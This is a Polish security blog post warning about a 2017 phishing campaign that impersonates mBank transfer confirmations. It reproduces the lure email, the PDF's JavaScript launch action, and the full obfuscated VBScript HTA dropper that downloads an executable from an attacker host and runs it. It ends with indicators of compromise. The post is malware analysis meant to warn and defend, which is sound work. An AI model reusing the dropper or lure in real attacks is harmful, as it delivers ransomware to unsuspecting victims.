Uwaga na nowy atak – „Potwierdzenie wykonania przelewu” od mBanku

dodał 20 września 2017 o 09:45 w kategorii Złośniki  z tagami:
Uwaga na nowy atak – „Potwierdzenie wykonania przelewu” od mBanku

Wakacje się skończyły i nasi krajowi przestępcy wracają do swoich zajęć. Po kilku miesiącach przerwy w skrzynkach Polaków ponownie pojawiają się dobrze podrobione emaile ze złośliwym oprogramowaniem.

Czasem już pierwszy rzut oka na wiadomość sugeruje nam, kto mógł być jej autorem. Nie inaczej jest w przypadku dzisiejszego ataku – z tym internetowym przestępcą znamy się bardzo dobrze, bo jego kampanie śledzimy od paru lat. Oto najnowsza jego produkcja.

Potwierdzenie wykonania przelewu

Wiadomość wygląda następująco:

Witamy,

w załączniku przesyłamy potwierdzenie wykonania przelewu na rachunek 21102010550000910200170647 tytułem NR F/001132/16. Nadawcą przelewu jest xxxxx .

Pozdrawiamy,
Zespół mBanku

Mail został wygenerowany automatycznie. Prosimy na niego nie odpowiadać, ponieważ taka wiadomość nie dotrze do mBanku.
W przypadku pytań prosimy o wysłanie nowego maila na adres kontakt@mbank.pl

W miejscu „xxxxx” znajduje się nazwa odbiorcy wiadomości – w przypadku naszych Czytelników, którzy zgłosili atak, były to nazwy firm, dla których pracują, zatem faktycznie autor ataku się postarał i uprawdopodobnił treść swojej przynęty.

(Nie)przywoity załącznik

Do wiadomości załączony jest plik PDF, który przechodzi przez silniki antywirusowe i filtry poczty jak gorący nóż przez masło. Jego zawartość w kluczowym fragmencie wygląda tak:

<<
/S /JavaScript
/JS (app.launchURL\('https://dokumenty-office365.pl/mbank/potwierdzenie-przelewu/',true\);)
/Type /Action
>>

a wizualnie prezentuje się tak:

W zależności od używanego czytnika PDF u osoby, która go otworzy, może:

  • nie wydarzyć się nic (najczęściej)
  • pojawić się prośba o pobranie i/lub uruchomienie zewnętrznego pliku.

Np. w czytniku Nitro wygląda ona tak:

W przypadku gdy program domyślnie pobiera zewnętrzne zasoby lub użytkownik mu na to pozwoli, na komputerze pojawi się plik

Potwierdzenie wykonania przelewu.hta

o następującej treści:

<html>
<body>
<script type="text/vbscript">
Function frhwToTV(tpDNKbAR)
Dim GnZdBNiO, TlvtrAPK
For GnZdBNiO = 1 To LenB(tpDNKbAR)
TlvtrAPK = TlvtrAPK & Chr(AscB(MidB(tpDNKbAR, GnZdBNiO, 1)))
Next
frhwToTV = TlvtrAPK
End Function
Sub hjRKinxH(uhnaZZeD, HfJqPMMA)
Dim iznXklRi: Set iznXklRi = CreateObject("MSXML2.ServerXMLHTTP")
Dim wxJnbXze: wxJnbXze = "GET"
iznXklRi.Open wxJnbXze, uhnaZZeD, False
iznXklRi.Send
Dim JvfERKgb, WtBUIxOX
Set WtBUIxOX = CreateObject("Scripting.FileSystemObject").OpenTextFile(HfJqPMMA, 2, True)
WtBUIxOX.WriteLine (frhwToTV(iznXklRi.ResponseBody))
WtBUIxOX.Close()
Set iznXklRi = Nothing
Set WtBUIxOX = Nothing
End Sub
Dim krXkzkvU: krXkzkvU = CreateObject("WScript.Shell").ExpandEnvironmentStrings("%TEMP%") & "\sterownik.exe"
Dim xptBpWdQ: xptBpWdQ = "http://xxx-tube-24.pl/5600.exe"
hjRKinxH xptBpWdQ, krXkzkvU
CreateObject("WScript.Shell").Run Chr(34) & krXkzkvU & Chr(34)
</script>
<center>
<h1>mBank</h1>
Wystapil blad plik uszkodzonyss!
</center>
</body>
</html>

 Pod adresem

http://xxx-tube-24.pl/5600.exe

znajduje się ostateczny ładunek złośnika, czyli ransomware autorstwa Thomasa, opisywane przez nas kilka miesięcy temu. Ransomware to korzysta z adresów:

https://tanie-winpila.pl/mi5
http://xxx-tube-24.pl/rx7/
https://tawino.pila.pl/pass/
http://xxx-tube-24.pl/pass/

Plik binarny wrzucaliśmy jako pierwsi na VT, zatem jest nadzieja, że kampania dopiero ruszyła i zdążycie jeszcze ostrzec znajomych. Podajcie dalej.

Jeśli zaś chcecie nauczyć swoich pracowników jak wyglądają takie ataki i jak ich unikać, zaproście nas do siebie z wykładem, po którym sami będą wykrywać i zgłaszać podobne zagrożenia.

Security Awareness - szkolenie dla personelu

W bonusie kilka gotowców dla obrońców:

Potwierdzenie wykonania przelewu.pdf dc734bebdf18794ecea3eca379a59684b80f67a3 
Potwierdzenie wykonania przelewu.hta 51a9575e3044a3fa320b182ca190050e118a4227
5600.exe 949fca8bab5c656fa950dd65cb896ecfdde68776, https://www.hybrid-analysis.com/sample/9f617bee97b9c676dd5ed928093f64e020c6e93ea60b0f641fc3127a7a325ced?environmentId=100

Received: from adb174.rev.netart.pl (adb174.rev.netart.pl. [77.55.79.174])
Received: from [192.168.25.131] (server.cloudbalkan.com [78.130.176.163])

xxx-tube-24.pl 77.222.62.225
dokumenty-office365.pl 104.27.190.78